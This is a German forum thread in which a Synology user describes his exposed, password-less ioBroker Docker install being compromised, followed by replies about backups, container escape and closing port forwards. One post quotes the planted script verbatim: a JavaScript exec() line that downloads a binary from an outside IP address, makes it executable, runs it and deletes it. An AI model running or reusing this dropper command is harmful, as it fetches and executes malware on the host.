Antivirus Essential scannt wenige Dateien

[Synchrotron]

Was soll ich denn suchen? Verstehe gerade nur Bahnhof

IoBroker in der Forumsuche sollte reichen, vielleicht noch mit dem Zusatz Verschlüssel oder Ransom.

 

[BenAhrdt]

synology adapter, welcherwohl die lücke war, habe ich schon mal nicht

 

[Benie]

Die DS ist ja mein Backup :-(

Wo ist das BackUp für die DS ? Die geht in solch einem Fall vor die Hunde

 

[BenAhrdt]

Das stimmt wohl. Backup vom Backup ... daran habe ich nicht gedacht
Denke besorge mir mal dringend ne USB Platte

 

[Benie]

Könnte mal von Vorteil sein, außer Viren- u. Hackerprobleme kann Dir ja auch mal die DS selbst oder ein Laufwerk abrauchen.
Aktuell weiß man ja nicht was für ein System und mit welchem Aufbau Du hast, aber ein BackUp von der DS ist eigentlich ein muß.
Bei mir läuft täglich ein Backup und mind. einmal die Woche ein Sync auf eine zweite DS und da bin ich hier nicht alleine der es so macht.

 

[Ulfhednir]

synology adapter, welcherwohl die lücke war, habe ich schon mal nicht

Ist denn deine ioBroker-Installation per Portforwarding nach außen erreichbar gewesen? Du sprachst von einem Skript, was ist das für eins gewesen und woher hast du dieses?

 

[BenAhrdt]

Könnte mal von Vorteil sein, außer Viren- u. Hackerprobleme kann Dir ja auch mal die DS selbst oder ein Laufwerk abrauchen.
Aktuell weiß man ja nicht was für ein System und mit welchem Aufbau Du hast, aber ein BackUp von der DS ist eigentlich ein muß.
Bei mir läuft täglich ein Backup und mind. einmal die Woche ein Sync auf eine zweite DS und da bin ich hier nicht alleine der es so macht.

OK, krass. Ich habe ne DS220+ mit eben 2 gespiegelten Platten.

 

[BenAhrdt]

Ist denn deine ioBroker-Installation per Portforwarding nach außen erreichbar gewesen? Du sprachst von einem Skript, was ist das für eins gewesen und woher hast du dieses?

Ja blöderweise hatte ich einen port offen und auch kein pw drin. (Absolut blöd von mir, weil vergessen).
das skript war: ... aber bloß nicht ausführen ;-)

exec('cd /tmp; wget http://185.216.71.168/x-8.6-.ISIS; chmod +x x-8.6-.ISIS; ./x-8.6-.ISIS; rm -rf x-8.6-.ISIS', function (error, stdout, stderr) {
    console.log('stdout: ' + stdout);

wird dann je denke im "OS" des docker containers ausgeführt, oder?
Er kommt ja so nicht auf den gemouteten Ordner, oder?
also habe den eh gelöscht, aber rein interessehalber.

 

[ottosykora]

es gab schon mehrere Fälle mit iobroker und Verschlüsselung
ich glaube das hier ist so was:
https://www.synology-forum.de/threads/daten-vom-hacker-verschluesselt.112225/

aber es sind sicher noch mehrere Threads mit ähnlichem Thema

mehrmals war iobroker irgendwie beteiligt

 

[Benie]

Kann den jemand zu diesem Script und was es beinhaltet etwas genaueres sagen ?

 

[BenAhrdt]

es läd wohl die angegebene datei runter

cd / temp würde für mich aber bedeuten in den container internen ordner, oder? also nichts auf der ds

 

[Ulfhednir]

wird dann je denke im "OS" des docker containers ausgeführt, oder?
Er kommt ja so nicht auf den gemouteten Ordner, oder?
also habe den eh gelöscht, aber rein interessehalber.

Sage niemals nie. Es ist durchaus schon gelungen aus den Docker-Container auszubrechen.
https://www.heise.de/security/meldu...with,Docker-Containern in einer Weboberfläche.

Ob das jetzt bei dir der Fall ist, wird dir keiner verraten können. Monk wird dir sagen, dass dein System nicht mehr sicher ist und würde dir empfehlen das platt zu machen. Mich würde das Ganze jetzt nicht unbedingt aus der Ruhe bringen.

Eines würde ich dir trotzdem empfehlen: Prüfe deine Adapter. Wenn du Fremdsysteme integriert hast, sind oftmals Kennwort & Co. hinterlegt. Wenn man die Config-File ausliest oder überträgt, kann man auch damit ausreichend Unsinn anstellen.

Und nochmal zum Skript: Woher hast du das? Wer hat dich zum Suizid angestiftet?

 

[BenAhrdt]

OK, wenn es Dich nicht aus der Ruhe bringen würde hört sich ja erst einmal nicht schlecht an
Das skript habe ich in dem Javaskript adapte rim iobroker gefunden.

Wie egsagt, habe den container gelöscht und ein neuens image aufgesetzt gemountet mit einem backup von von 3 wochen.

 

[Rotbart]

Mag etwas paranoid klingen aber ich würde soetwas was wenn möglich immer in einer VM laufen lassen, getrennt von meinen Daten und ich kann es auch einfacher sichern und wiederherstellen.

 

[BenAhrdt]

Gerade wegen dem leicht wiederherstellen habe ich ja auf docker geswitched

 

[Rotbart]

Ich meinte Docker in der VM, bei einem Plus Modell bekommst du ja eine dazu.

 

[BenAhrdt]

Ok, wusste ich nicht, das vom und darin Docker Sinn macht. Dachte ok es gibt für die ds den docker, also Nutz den.

 

[Rotbart]

Kann man ja auch machen nur wenn da irgendwas schief läuft (wie schon mehrmals passiert) setzte ich einfach die VM neu auf anstatt die ganze Station mit allen Daten,Dokumenten,Fotos,Einrichtung ...

 

[Ulfhednir]

Und auch eine VM ist nicht zwangsweise sicher. Hier mal ein Beispiel:
https://www.heise.de/security/meldu...sst-kritische-Sicherheitsluecken-3894067.html

Das ist jetzt auch Jacke wie Hose. Der Fehler hockt vorm Bildschirm, wie BenAhrdt schon selbstkritisch erkannt hat.
Bei mir läuft übrigens seit 3-4 Jahren der ioBroker auf der DS. Mein System wurde noch nicht gehacked. Ich bin mir aber auch der Risiken von Portforwardings und Co. bewusst und habe den nötigen IT-Background.

Das skript habe ich in dem Javaskript adapte rim iobroker gefunden.

Du solltest übrigens tunlichst deine Portfreigaben checken und diese schließen.